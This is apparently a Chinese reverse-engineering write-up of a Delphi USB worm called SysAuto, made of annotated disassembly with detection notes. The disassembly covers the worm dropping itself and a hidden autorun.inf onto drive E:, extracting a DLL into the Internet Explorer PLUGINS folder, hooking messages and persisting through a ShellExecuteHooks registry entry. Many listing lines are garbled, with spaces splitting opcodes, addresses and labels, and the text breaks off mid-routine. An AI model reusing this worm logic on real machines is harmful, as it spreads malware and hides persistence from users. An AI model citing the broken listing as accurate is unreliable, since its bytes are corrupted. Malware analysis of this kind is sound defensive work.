首先用PEiD查看,发现是用UPX加壳;脱壳后识别为Delphi编写。
程序从文件末尾读出(已加密的)文件大小,XOR解密后得到真正的文件大小。
下面是简单的分析过程:
将病毒文件及启动文件autorun.inf复制到E盘,然后为文件设置隐藏属性(HIDDEN|SYSTEM)
; 0040484C: drop routine for drive E: (Delphi code with a try/finally-style SEH frame).
; What the listing shows: reset attributes on and delete any old E:/SysAuto.exe, CopyFileA a
; file (presumably the running image, see note at 00404893) to E:/SysAuto.exe, write
; E:/AutoRun.Inf through 00404CA0, then mark the copy HIDDEN|SYSTEM.
; Detection angle: hidden+system executable plus an autorun.inf appearing on a secondary/removable drive.
0040484C /$ 55 push ebp
0040484D |. 8BEC mov ebp,esp
0040484F |. 6A 00 push 0
00404851 |. 6A 00 push 0
00404853 |. 33C 0 xor eax,eax
00404855 |. 55 push ebp
00404856 |. 68 02494000 push SysAuto1.00404902
0040485B |. 64:FF30 push dword ptr fs:[eax]
0040485E |. 64:8920 mov dword ptr fs:[eax],esp
; Above: exception frame installed on the fs:[0] chain with handler 00404902; it is unwound at 004048E7.
00404861 |. 8D55 FC lea edx,dword ptr ss:[ebp-4]
00404864 |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
00404869 |. E8 86FEFFFF call SysAuto 1.004046F 4
; 004046F4 is not in this listing; presumably it stores a copy of "E:/" in the local at [ebp-4] — confirm.
0040486E |. 68 80000000 push 80 ; /FileAttributes = NORMAL
00404873 |. 68 1C 494000 push SysAuto 1.0040491C ; |FileName = "E:/SysAuto.exe"
00404878 |. E8 BFFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA
; Clearing attributes first so the DeleteFileA below succeeds on a previously hidden/system copy.
0040487D |. 68 1C 494000 push SysAuto 1.0040491C ; /FileName = "E:/SysAuto.exe"
00404882 |. E8 25FBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
00404887 |. 6A 00 push 0
; push 0 here is CopyFileA's last parameter (bFailIfExists = FALSE); the next push is NewFileName.
00404889 |. 68 1C 494000 push SysAuto 1.0040491C ; ASCII "E:/SysAuto.exe"
0040488E |. 8D 55 F 8 lea edx,dword ptr ss:[ebp-8]
00404891 |. 33C 0 xor eax,eax
00404893 |. E 8 F 0E1FFFF call SysAuto 1.00402A 88
; 00402A88(eax=0, edx=&[ebp-8]) is not shown; the result is used as ExistingFileName, so it is
; presumably the running module's own path (e.g. ParamStr(0)) — TODO confirm.
00404898 |. 8B 45 F 8 mov eax,dword ptr ss:[ebp-8]
0040489B |. E8 E4EEFFFF call SysAuto1.00403784
; 00403784 is called before every API that takes a C string; looks like the Delphi string -> PChar helper — confirm.
004048A 0 |. 50 push eax ; |ExistingFileName
004048A 1 |. E 8 F 6FAFFFF call <jmp.&KERNEL32.CopyFileA> ; /CopyFileA
004048A 6 |. BA 34494000 mov edx,SysAuto1.00404934
004048AB |. B8 98494000 mov eax,SysAuto1.00404998 ; ASCII "E:/AutoRun.Inf"
004048B0 |. E8 EB030000 call SysAuto1.00404CA0
; 00404CA0(eax=path, edx=content) creates the file and writes the buffer (see its listing below);
; the autorun.inf text at 00404934 is not dumped here.
004048B5 |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
004048B7 |. 68 1C 494000 push SysAuto 1.0040491C ; |FileName = "E:/SysAuto.exe"
004048BC |. E8 7BFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA
004048C 1 |. BA B0494000 mov edx,SysAuto1.004049B0 ; ASCII "Proc"
004048C 6 |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
004048CB |. E8 5CFFFFFF call SysAuto 1.0040482C
; 0040482C(eax="E:/", edx=...) is called twice (here with "Proc", below with the saved [ebp-4] copy);
; its body is not in this listing, so its purpose cannot be stated from here.
004048D0 |. 68 F 4010000 push 1F 4 ; /Timeout = 500. ms
004048D5 |. E8 82FBFFFF call <jmp.&KERNEL32.Sleep> ; /Sleep
004048DA |. 8B55 FC mov edx,dword ptr ss:[ebp-4]
004048DD |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
004048E2 |. E8 45FFFFFF call SysAuto 1.0040482C
004048E7 |. 33C 0 xor eax,eax
004048E9 |. 5A pop edx
004048EA |. 59 pop ecx
004048EB |. 59 pop ecx
004048EC |. 64:8910 mov dword ptr fs:[eax],edx
; Frame unwound: fs:[0] restored to the saved previous handler.
004048EF |. 68 09494000 push SysAuto1.00404909
004048F 4 |> 8D 45 F 8 lea eax,dword ptr ss:[ebp-8]
004048F 7 |. BA 02000000 mov edx,2
004048FC |. E8 27ECFFFF call SysAuto1.00403528
; 00403528(eax=&[ebp-8], edx=2) runs on the two string locals at [ebp-8]/[ebp-4]; looks like the
; Delphi "finalize string array" helper — confirm. The retn then lands on the pushed 00404909.
00404901 /. C3 retn
创建autorun.inf文件
; 00404CA0: write a whole buffer to a new file. Register convention: eax = file name, edx = content.
; Returns eax = -1 when the file was created and written, 0 when CreateFileA failed (edi is the
; result register: zeroed at 00404CA8, set to -1 at 00404CF6 only on the success path).
; The file is created with FILE_ATTRIBUTE_HIDDEN|SYSTEM (push 6), so the dropped autorun.inf is hidden.
00404CA0 /$ 53 push ebx
00404CA1 |. 56 push esi
00404CA2 |. 57 push edi
00404CA3 |. 51 push ecx
; The push ecx above reserves one dword on the stack; it is reused at 00404CCF as lpNumberOfBytesWritten.
00404CA4 |. 8BF2 mov esi,edx
00404CA6 |. 8BD8 mov ebx,eax
00404CA8 |. 33FF xor edi,edi
; CreateFileA parameters, pushed right to left:
;   hTemplateFile=0, dwFlagsAndAttributes=6 (HIDDEN|SYSTEM), dwCreationDisposition=2 (CREATE_ALWAYS),
;   lpSecurityAttributes=0, dwShareMode=3 (FILE_SHARE_READ|FILE_SHARE_WRITE), dwDesiredAccess=C0000000 (GENERIC_READ|GENERIC_WRITE).
00404CAA |. 6A 00 push 0
00404CAC |. 6A 06 push 6
00404CAE |. 6A 02 push 2
00404CB0 |. 6A 00 push 0
00404CB2 |. 6A 03 push 3
00404CB4 |. 68 000000C 0 push C0000000
00404CB9 |. 8BC3 mov eax,ebx
00404CBB |. E 8 C 4EAFFFF call SysAuto1.00403784
; 00403784: string -> PChar conversion helper (presumed, not shown in this listing).
00404CC0 |. 50 push eax ; |FileName
00404CC1 |. E8 DEF6FFFF call <jmp.&KERNEL32.CreateFileA> ; /CreateFileA
00404CC6 |. 8BD8 mov ebx,eax
00404CC8 |. 83FB FF cmp ebx,-1
00404CCB |. 74 2C je short SysAuto1.00404CF9
; INVALID_HANDLE_VALUE -> skip the write and return edi (still 0).
00404CCD |. 6A 00 push 0
00404CCF |. 8D4424 04 lea eax,dword ptr ss:[esp+4]
00404CD3 |. 50 push eax
00404CD4 |. 8BC6 mov eax,esi
00404CD6 |. E8 45E9FFFF call SysAuto1.00403620
; 00403620(eax=content) supplies nNumberOfBytesToWrite; presumably the string length helper — confirm.
00404CDB |. 50 push eax
00404CDC |. 8BC6 mov eax,esi
00404CDE |. E 8 A 1EAFFFF call SysAuto1.00403784
00404CE3 |. 50 push eax ; |Buffer
00404CE4 |. 53 push ebx ; |hFile
00404CE5 |. E8 7AF7FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile
; WriteFile's return value is not checked; a short/failed write still yields the -1 "success" result.
00404CEA |. 53 push ebx ; /hFile
00404CEB |. E8 44F 7FFFF call <jmp.&KERNEL32.SetEndOfFile> ; /SetEndOfFile
00404CF0 |. 53 push ebx ; /hObject
00404CF1 |. E8 9EF6FFFF call <jmp.&KERNEL32.CloseHandle> ; /CloseHandle
00404CF6 |. 83CF FF or edi,FFFFFFFF
00404CF9 |> 8BC7 mov eax,edi
00404CFB |. 5A pop edx
; pop edx discards the scratch dword pushed at 00404CA3.
00404CFC |. 5F pop edi
00404CFD |. 5E pop esi
00404CFE |. 5B pop ebx
00404CFF /. C3 retn
向C:/Program Files/Internet Explorer/PLUGINS/复制文件System64.Sys
; Excerpt starting at 00405719: the routine's prologue (and the setup of esi/ebx and the globals at
; 4060C4/4060C8/4076C4) is above this listing, so register/global meanings below are partly inferred.
; Visible behaviour: compare two paths with lstrcmpiA; if they differ, delete/copy/hide a file at the
; path kept in *[4060C8]; then build "<dir>System64.Tao" and "<dir>System64.Sys" (dir = [4076C4],
; shown as "C:/Program Files/Internet Explorer/PLUGINS/" at 004057D8), delete System64.Sys, and test
; whether it still exists.
00405719 |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
0040571E |. 8B00 mov eax,dword ptr ds:[eax]
00405720 |. E8 5FE0FFFF call SysAuto1.00403784
00405725 |. 50 push eax
00405726 |. 8D55 D4 lea edx,dword ptr ss:[ebp -2C ]
00405729 |. A 1 C 4604000 mov eax,dword ptr ds:[ 4060C 4]
0040572E |. E8 85F 2FFFF call SysAuto1.004049B8
; 004049B8(eax=[4060C4], edx=&[ebp-2C]) derives a string from [4060C4]; helper not shown — its exact transform is unknown.
00405733 |. 8B45 D4 mov eax,dword ptr ss:[ebp -2C ]
00405736 |. E8 49E0FFFF call SysAuto1.00403784
0040573B |. 50 push eax ; |String1
0040573C |. E8 33EDFFFF call <jmp.&KERNEL32.lstrcmpiA> ; /lstrcmpiA
00405741 |. 85C 0 test eax,eax
00405743 |. 74 5D je short SysAuto 1.004057A 2
; Equal -> already at the expected path, skip the copy below. Looks like a self-install check — confirm.
00405745 |. 8B0D C8604000 mov ecx,dword ptr ds:[ 4060C 8] ; SysAuto 1.004060AC
0040574B |. 8B09 mov ecx,dword ptr ds:[ecx]
0040574D |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
00405752 |. 8B 15 C 4764000 mov edx,dword ptr ds:[ 4076C 4]
00405758 |. E8 0FDFFFFF call SysAuto 1.0040366C
; 0040366C(eax=dest, edx=[4076C4], ecx=name) is used below to produce "<PLUGINS dir>System64.Sys",
; so it behaves like a two-string concatenation into *eax (presumed Delphi LStrCat3).
0040575D |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
00405762 |. 8B00 mov eax,dword ptr ds:[eax]
00405764 |. E8 1BE0FFFF call SysAuto1.00403784
00405769 |. 50 push eax ; /FileName
0040576A |. E8 3DECFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
0040576F |. 6A 00 push 0
; CopyFileA(lpExistingFileName=[4060C4], lpNewFileName=*[4060C8], bFailIfExists=0)
00405771 |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
00405776 |. 8B00 mov eax,dword ptr ds:[eax]
00405778 |. E8 07E0FFFF call SysAuto1.00403784
0040577D |. 50 push eax
0040577E |. A 1 C 4604000 mov eax,dword ptr ds:[ 4060C 4]
00405783 |. E8 FCDFFFFF call SysAuto1.00403784
00405788 |. 50 push eax ; |ExistingFileName
00405789 |. E8 0EECFFFF call <jmp.&KERNEL32.CopyFileA> ; /CopyFileA
0040578E |. 6A 06 push 6
; 6 = FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM applied to the copied file.
00405790 |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
00405795 |. 8B00 mov eax,dword ptr ds:[eax]
00405797 |. E8 E8DFFFFF call SysAuto1.00403784
0040579C |. 50 push eax ; |FileName
0040579D |. E8 9AECFFFF call <jmp.&KERNEL32.SetFileAttributes>; /SetFileAttributesA
004057A 2 |> B 8 C 0764000 mov eax,SysAuto 1.004076C 0
004057A 7 |. B9 74594000 mov ecx,SysAuto1.00405974 ; ASCII "System64.Tao"
004057AC |. 8B 15 C 4764000 mov edx,dword ptr ds:[ 4076C 4]
004057B2 |. E8 B5DEFFFF call SysAuto 1.0040366C
; [4076C0] = [4076C4] + "System64.Tao"  (staging name used when System64.Sys cannot be replaced directly)
004057B7 |. B 8 C 8764000 mov eax,SysAuto 1.004076C 8
004057BC |. B9 8C 594000 mov ecx,SysAuto 1.0040598C ; ASCII "System64.Sys"
004057C 1 |. 8B 15 C 4764000 mov edx,dword ptr ds:[ 4076C 4]
004057C 7 |. E 8 A 0DEFFFF call SysAuto 1.0040366C
; [4076C8] = [4076C4] + "System64.Sys"  (the dropped DLL's final path; a useful file-system indicator)
004057CC |. A 1 C 8764000 mov eax,dword ptr ds:[ 4076C 8]
004057D1 |. E8 AEDFFFFF call SysAuto1.00403784
004057D6 |. 8BD8 mov ebx,eax
; ebx keeps the PChar of the System64.Sys path for the rest of the routine.
004057D8 |. 53 push ebx ; /FileName = "C:/Program Files/Internet Explorer/PLUGINS/System64.Sys"
004057D9 |. E8 CEEBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
004057DE |. 53 push ebx ; /Path
004057DF |. E8 44EEFFFF call <jmp.&shlwapi.PathFileExistsA> ; /PathFileExistsA
; Delete first, then test existence: a file that survives DeleteFileA (e.g. still loaded) takes the
; staged-replacement branch at 004057E8, otherwise the direct-extraction branch at 0040581B.
先删除该文件,再判断文件是否仍然存在:如果不存在,直接从资源中释放;如果仍然存在,则先释放为System64.Tao,再交由改名例程替换
; Continuation of the routine excerpted from 00405719 (prologue not in this listing).
; eax here is the PathFileExistsA result for the System64.Sys path held in ebx.
004057E4 |. 85C 0 test eax,eax
004057E6 |. 74 33 je short SysAuto1.0040581B
; --- file still exists: extract the resource to System64.Tao, then hand both paths to 00404E70,
; which schedules a rename-on-reboot (wininit.ini or MoveFileExA, see its listing below).
004057E8 |. A1 CC764000 mov eax,dword ptr ds:[4076CC]
004057ED |. 50 push eax
; [4076CC] is passed as the stack argument of 00404A40, which appends it to the dropped file; its content is not shown here.
004057EE |. A 1 C 0764000 mov eax,dword ptr ds:[ 4076C 0]
004057F 3 |. E8 8CDFFFFF call SysAuto1.00403784
004057F 8 |. 8BC8 mov ecx,eax ; |
004057FA |. BA 9C 594000 mov edx,SysAuto 1.0040599C ; |ASCII "FILE"
004057FF |. B8 0A 000000 mov eax, 0A ; |
; 00404A40(eax=resource type 0A = RT_RCDATA, edx=resource name "FILE", ecx=output path, [Arg1]=trailer string)
00405804 |. E8 37F 2FFFF call SysAuto 1.00404A 40 ; /SysAuto 1.00404A 40
00405809 |. 8B 15 C 0764000 mov edx,dword ptr ds:[ 4076C 0]
0040580F |. A 1 C 8764000 mov eax,dword ptr ds:[ 4076C 8]
00405814 |. E8 57F 6FFFF call SysAuto1.00404E70
; 00404E70(eax=System64.Sys path, edx=System64.Tao path): deferred replace, see 00404E70 below.
00405819 |. EB 17 jmp short SysAuto1.00405832
; --- file is gone: extract the resource straight to System64.Sys.
0040581B |> A1 CC764000 mov eax,dword ptr ds:[4076CC]
00405820 |. 50 push eax ; /Arg1 => 009B02B4
00405821 |. 8BCB mov ecx,ebx ; |
00405823 |. BA 9C 594000 mov edx,SysAuto 1.0040599C ; |ASCII "FILE"
00405828 |. B8 0A 000000 mov eax, 0A ; |
0040582D |. E8 0EF2FFFF call SysAuto 1.00404A 40 ; /SysAuto 1.00404A 40
; --- single-instance style checks: 00404A00 is probed with two fixed names; a non-zero result skips
; straight to the registry section at 004058F5. The helper is not shown, so whether it looks up a
; window, mutex or something else cannot be confirmed from here; the two strings are usable as indicators.
00405832 |> BA A4594000 mov edx,SysAuto 1.004059A 4 ; ASCII "yyyrt8jjjk9bjko"
00405837 |. 33C 0 xor eax,eax
00405839 |. E 8 C 2F 1FFFF call SysAuto 1.00404A 00
0040583E |. 85C 0 test eax,eax
00405840 |. 0F 85 AF000000 jnz SysAuto 1.004058F 5
00405846 |. BA B4594000 mov edx,SysAuto1.004059B4 ; ASCII "xxkxxxxjtrj8jok"
0040584B |. 33C 0 xor eax,eax
0040584D |. E8 AEF1FFFF call SysAuto 1.00404A 00
00405852 |. 85C 0 test eax,eax
00405854 |. 0F 85 9B000000 jnz SysAuto 1.004058F 5
; 004054FC takes 8 stack args plus eax="Edit", edx="yyyrt8jjjk9bjko", ecx=0, with Arg2 = the module
; base at [407650]; the shape matches a CreateWindowExA-style wrapper creating an "Edit" window whose
; caption is the first probe string above — presumed, not shown.
0040585A |. 6A 00 push 0 ; /Arg8 = 00000000
0040585C |. 6A 00 push 0 ; |Arg7 = 00000000
0040585E |. 6A 00 push 0 ; |Arg6 = 00000000
00405860 |. 6A 00 push 0 ; |Arg5 = 00000000
00405862 |. 6A 00 push 0 ; |Arg4 = 00000000
00405864 |. 6A 00 push 0 ; |Arg3 = 00000000
00405866 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
0040586B |. 50 push eax ; |Arg2 => 00400000 ASCII "MZP"
0040586C |. 6A 00 push 0 ; |Arg1 = 00000000
0040586E |. BA A4594000 mov edx,SysAuto 1.004059A 4 ; |ASCII "yyyrt8jjjk9bjko"
00405873 |. B 8 C 4594000 mov eax,SysAuto 1.004059C 4 ; |ASCII "Edit"
00405878 |. 33C 9 xor ecx,ecx ; |
0040587A |. E8 7DFCFFFF call SysAuto1.004054FC ; /SysAuto1.004054FC
; --- load the dropped DLL and drive it through its two exports.
0040587F |. 53 push ebx ; /FileName
00405880 |. E8 87EBFFFF call <jmp.&KERNEL32.LoadLibraryA> ; /LoadLibraryA
00405885 |. 8BD8 mov ebx,eax
00405887 |. 85DB test ebx,ebx
00405889 |. 74 6A je short SysAuto 1.004058F 5
0040588B |. 68 CC594000 push SysAuto1.004059CC ; /ProcNameOrOrdinal = "MsgHookOff"
00405890 |. 53 push ebx ; |hModule
00405891 |. E8 4EEBFFFF call <jmp.&KERNEL32.GetProcAddress> ; /GetProcAddress
00405896 |. A3 D0764000 mov dword ptr ds:[4076D0],eax
; [4076D0] = MsgHookOff, [4076D4] = MsgHookOn (export names of System64.Sys; both are checked for NULL below).
0040589B |. 68 D8594000 push SysAuto1.004059D8 ; /ProcNameOrOrdinal = "MsgHookOn"
004058A 0 |. 53 push ebx ; |hModule
004058A 1 |. E8 3EEBFFFF call <jmp.&KERNEL32.GetProcAddress> ; /GetProcAddress
004058A 6 |. A3 D4764000 mov dword ptr ds:[4076D4],eax
004058AB |. 833D D0764000>cmp dword ptr ds:[4076D0],0
004058B2 |. 74 41 je short SysAuto 1.004058F 5
004058B4 |. 833D D4764000>cmp dword ptr ds:[4076D4],0
004058BB |. 74 38 je short SysAuto 1.004058F 5
004058BD |. FF15 D4764000 call dword ptr ds:[4076D4]
; MsgHookOn() then a plain GetMessageA/DispatchMessageA loop; the loop only ends when GetMessageA
; returns 0 (WM_QUIT), so the process normally stays resident here. esi (pMsg) is set up before this excerpt.
004058C 3 |. EB 06 jmp short SysAuto1.004058CB
004058C 5 |> 56 /push esi ; /pMsg
004058C 6 |. E 8 C 9EBFFFF |call <jmp.&user32.DispatchMessageA> ; /DispatchMessageA
004058CB |> 6A 00 push 0 ; /MsgFilterMax = 0
004058CD |. 6A 00 |push 0 ; |MsgFilterMin = 0
004058CF |. 6A 00 |push 0 ; |hWnd = NULL
004058D1 |. 56 |push esi ; |pMsg
004058D2 |. E8 D5EBFFFF |call <jmp.&user32.GetMessageA> ; /GetMessageA
004058D7 |. 85C 0 |test eax,eax
004058D9 |.^ 75 EA /jnz short SysAuto 1.004058C 5
004058DB |. FF15 D0764000 call dword ptr ds:[4076D0]
; MsgHookOff(), then cleanup. CloseWindow(NULL) is called twice; with a NULL handle it does nothing useful.
004058E1 |. 6A 00 push 0 ; /hWnd = NULL
004058E3 |. E8 9CEBFFFF call <jmp.&user32.CloseWindow> ; /CloseWindow
004058E8 |. 53 push ebx ; /hLibModule
004058E9 |. E8 CEEAFFFF call <jmp.&KERNEL32.FreeLibrary> ; /FreeLibrary
004058EE |. 6A 00 push 0 ; /hWnd = NULL
004058F 0 |. E8 8FEBFFFF call <jmp.&user32.CloseWindow> ; /CloseWindow
; --- persistence. NOTE: every early-exit jump above (probe hit, LoadLibraryA or GetProcAddress
; failure) lands here too, so the registry entries are written even when the DLL was never loaded.
; 00404D00(eax=80000002 HKEY_LOCAL_MACHINE, edx=subkey, ecx=value name, [Arg1]=value data):
; HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{754FB7D8-...} = <string at 004059E4>.
; A ShellExecuteHooks entry makes Explorer load the CLSID's in-proc server; the CLSID is registered by 00404D60.
; Detection: monitor writes under ShellExecuteHooks and new CLSID\...\InProcServer32 values pointing into the IE PLUGINS directory.
004058F 5 |> 68 E4594000 push SysAuto1.004059E4 ; /Arg1 = 004059E4
004058FA |. B9 E8594000 mov ecx,SysAuto1.004059E8 ; |ASCII "{754FB7D8-B8FE-4810-B363-A788CD 060F 1F }"
004058FF |. BA 105A 4000 mov edx,SysAuto 1.00405A 10 ; |ASCII "SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/ShellExecuteHooks"
00405904 |. B8 02000080 mov eax,80000002 ; |
00405909 |. E 8 F 2F 3FFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
0040590E |. A 1 C 8764000 mov eax,dword ptr ds:[ 4076C 8]
00405913 |. E8 6CDEFFFF call SysAuto1.00403784
00405918 |. 50 push eax ; /Arg1
00405919 |. E8 42F 4FFFF call SysAuto1.00404D60 ; /SysAuto1.00404D60
; 00404D60(Arg1 = System64.Sys path) registers CLSID\{754FB7D8-...}\InProcServer32 (see its listing below).
0040591E |> 33C 0 xor eax,eax
00405920 |. 5A pop edx
00405921 |. 59 pop ecx
00405922 |. 59 pop ecx
00405923 |. 64:8910 mov dword ptr fs:[eax],edx
; Unwind of the SEH frame installed in the (unlisted) prologue.
00405926 |. 68 40594000 push SysAuto1.00405940
0040592B |> 8D45 D4 lea eax,dword ptr ss:[ebp -2C ]
0040592E |. BA 07000000 mov edx,7
00405933 |. E 8 F 0DBFFFF call SysAuto1.00403528
; 00403528(eax=&[ebp-2C], edx=7): finalize seven string locals (presumed Delphi helper), then retn continues at 00405940.
00405938 /. C3 retn
从资源中取出system64.sys
; 00404A40: extract an embedded resource to a file.
; Register/stack convention (from the callers at 004057FF and 00405828):
;   eax = resource type (callers pass 0A = RT_RCDATA), edx = resource name ("FILE"),
;   ecx = output file name (stored at [ebp-4]), [ebp+8] = string appended after the resource bytes.
; Returns nothing meaningful; every failure jumps to the common epilogue at 00404B0D.
; The output file is created HIDDEN|SYSTEM and consists of <resource bytes> + <Arg1 string>.
00404A 40 /$ 55 push ebp
00404A 41 |. 8BEC mov ebp,esp
00404A 43 |. 83C 4 F 4 add esp, -0C
; Locals: [ebp-4] = output name, [ebp-8] = bytes-written scratch, [ebp-C] = locked resource pointer.
00404A 46 |. 53 push ebx
00404A 47 |. 56 push esi
00404A 48 |. 57 push edi
00404A 49 |. 894D FC mov dword ptr ss:[ebp-4],ecx
00404A 4C |. 8BF2 mov esi,edx
00404A 4E |. 8BD8 mov ebx,eax
00404A 50 |. 837D 08 00 cmp dword ptr ss:[ebp+8],0
00404A 54 |. 0F 84 B3000000 je SysAuto1.00404B0D
; A NULL trailer string aborts the whole extraction.
00404A 5A |. 53 push ebx ; /ResourceType
00404A 5B |. 56 push esi ; |ResourceName
00404A 5C |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
00404A 61 |. 50 push eax ; |hModule => 00400000 (SysAuto1)
00404A 62 |. E8 4DF9FFFF call <jmp.&KERNEL32.FindResourc>; /FindResourceA
00404A 67 |. 8BF8 mov edi,eax ; SysAuto 1.0040C 080
00404A 69 |. 85FF test edi,edi
00404A 6B |. 0F 84 9C 000000 je SysAuto1.00404B0D
00404A 71 |. 57 push edi ; /hResource
00404A 72 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
00404A 77 |. 50 push eax ; |hModule => 00400000 (SysAuto1)
00404A 78 |. E8 97F 9FFFF call <jmp.&KERNEL32.LoadResourc>; /LoadResource
00404A 7D |. 8BF0 mov esi,eax
00404A 7F |. 85F 6 test esi,esi
00404A 81 |. 0F 84 86000000 je SysAuto1.00404B0D
00404A 87 |. 56 push esi ; /hResource
00404A 88 |. E8 8FF9FFFF call <jmp.&KERNEL32.LockResourc>; /LockResource
00404A 8D |. 8945 F 4 mov dword ptr ss:[ebp-C],eax
00404A 90 |. 837D F4 00 cmp dword ptr ss:[ebp-C],0
00404A 94 |. 74 77 je short SysAuto1.00404B0D
00404A 96 |. 6A 00 push 0 ; /hTemplateFile = NULL
00404A 98 |. 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00404A 9A |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00404A 9C |. 6A 00 push 0 ; |pSecurity = NULL
00404A 9E |. 6A 00 push 0 ; |ShareMode = 0
00404AA0 |. 68 000000C 0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00404AA5 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00404AA8 |. 50 push eax ; |FileName
00404AA9 |. E 8 F 6F 8FFFF call <jmp.&KERNEL32.CreateFileA>; /CreateFileA
00404AAE |. 8BD8 mov ebx,eax
00404AB0 |. 83FB FF cmp ebx,-1
00404AB3 |. 74 58 je short SysAuto1.00404B0D
; NOTE: on CreateFileA failure the loaded resource is never released (FreeResource is only reached on the success path).
00404AB5 |. 57 push edi ; /hResource
00404AB6 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
00404ABB |. 50 push eax ; |hModule => 00400000 (SysAuto1)
00404ABC |. E8 93F 9FFFF call <jmp.&KERNEL32.SizeofResou>; /SizeofResource
00404AC 1 |. 8BF8 mov edi,eax
; First WriteFile: the raw resource bytes (SizeofResource length).
00404AC 3 |. 6A 00 push 0 ; /pOverlapped = NULL
00404AC 5 |. 8D 45 F 8 lea eax,dword ptr ss:[ebp-8] ; |
00404AC 8 |. 50 push eax ; |pBytesWritten
00404AC 9 |. 57 push edi ; |nBytesToWrite
00404ACA |. 8B 45 F 4 mov eax,dword ptr ss:[ebp-C] ; |
00404ACD |. 50 push eax ; |Buffer
00404ACE |. 53 push ebx ; |hFile
00404ACF |. E8 90F 9FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile
; Second WriteFile: the Arg1 string is appended to the end of the dropped file.
; (Length from 00403620, buffer from 00403784 — presumed Delphi string length / PChar helpers.)
00404AD4 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404AD7 |. E8 44EBFFFF call SysAuto1.00403620
00404ADC |. 8BF8 mov edi,eax
00404ADE |. 6A 00 push 0
00404AE0 |. 8D 45 F 8 lea eax,dword ptr ss:[ebp-8]
00404AE3 |. 50 push eax
00404AE4 |. 57 push edi
00404AE5 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404AE8 |. E8 97ECFFFF call SysAuto1.00403784
00404AED |. 50 push eax ; |Buffer
00404AEE |. 53 push ebx ; |hFile
00404AEF |. E8 70F 9FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile
00404AF4 |. 53 push ebx ; /hFile
00404AF5 |. E8 3AF9FFFF call <jmp.&KERNEL32.SetEndOfFil>; /SetEndOfFile
00404AFA |. 53 push ebx ; /hObject
00404AFB |. E8 94F 8FFFF call <jmp.&KERNEL32.CloseHandle>; /CloseHandle
00404B00 |. 8BC6 mov eax,esi
00404B02 |. E8 B 5F 9FFFF call SysAuto1.004044BC
; 004044BC(eax=hResource) is not shown; purpose unknown from this listing.
00404B07 |. 56 push esi ; /hResource
00404B08 |. E8 B 7F 8FFFF call <jmp.&KERNEL32.FreeResourc>; /FreeResource
00404B0D |> 5F pop edi
00404B0E |. 5E pop esi
00404B 0F |. 5B pop ebx
00404B10 |. 8BE5 mov esp,ebp
00404B12 |. 5D pop ebp
00404B13 /. C2 0400 retn 4
修改注册表实现自启动(写入ShellExecuteHooks项及对应的CLSID/InProcServer32项)
; 00404D00: generic "create key and set one REG_SZ value" helper.
; Convention: eax = root hKey, edx = subkey path, ecx = value name, [ebp+8] = value data (C string).
; Locals: [ebp-4] = opened key handle (pre-zeroed), [ebp-8] = disposition out-param.
; Defect worth noting: the RegCreateKeyExA result is never tested, so on failure the handle stays 0
; and RegSetValueExA / RegCloseKey are called with a NULL key.
00404D00 /$ 55 push ebp
00404D01 |. 8BEC mov ebp,esp
00404D03 |. 83C 4 F 8 add esp,-8
00404D06 |. 53 push ebx
00404D07 |. 56 push esi
00404D08 |. 8BF1 mov esi,ecx
00404D 0A |. 8B5D 08 mov ebx,dword ptr ss:[ebp+8]
00404D0D |. 33C 9 xor ecx,ecx
00404D 0F |. 894D FC mov dword ptr ss:[ebp-4],ecx
00404D12 |. C 745 F 8 01000>mov dword ptr ss:[ebp-8],1
00404D19 |. 8D4D F8 lea ecx,dword ptr ss:[ebp-8]
00404D 1C |. 51 push ecx ; /pDisposition
00404D1D |. 8D4D FC lea ecx,dword ptr ss:[ebp-4] ; |
00404D20 |. 51 push ecx ; |pHandle
00404D21 |. 6A 00 push 0 ; |pSecurity = NULL
00404D23 |. 68 3F 000F 00 push 0F 003F ; |Access = KEY_ALL_ACCESS
00404D28 |. 6A 00 push 0 ; |Options = REG_OPTION_NON_VOLATILE
00404D 2A |. 6A 00 push 0 ; |Class = NULL
00404D 2C |. 6A 00 push 0 ; |Reserved = 0
00404D2E |. 52 push edx ; |Subkey
00404D 2F |. 50 push eax ; |hKey
00404D30 |. E8 4FF6FFFF call <jmp.&advapi32.RegCreateKe>; /RegCreateKeyExA
; Return code discarded (see header note).
00404D35 |. 53 push ebx ; /String = ""
00404D36 |. E8 41F 7FFFF call <jmp.&KERNEL32.lstrlenA> ; /lstrlenA
00404D3B |. 40 inc eax
; cbData = strlen + 1 so the terminating NUL is stored with the REG_SZ value.
00404D 3C |. 50 push eax ; /BufSize
00404D3D |. 53 push ebx ; |Buffer
00404D3E |. 6A 01 push 1 ; |ValueType = REG_SZ
00404D40 |. 6A 00 push 0 ; |Reserved = 0
00404D42 |. 56 push esi ; |ValueName
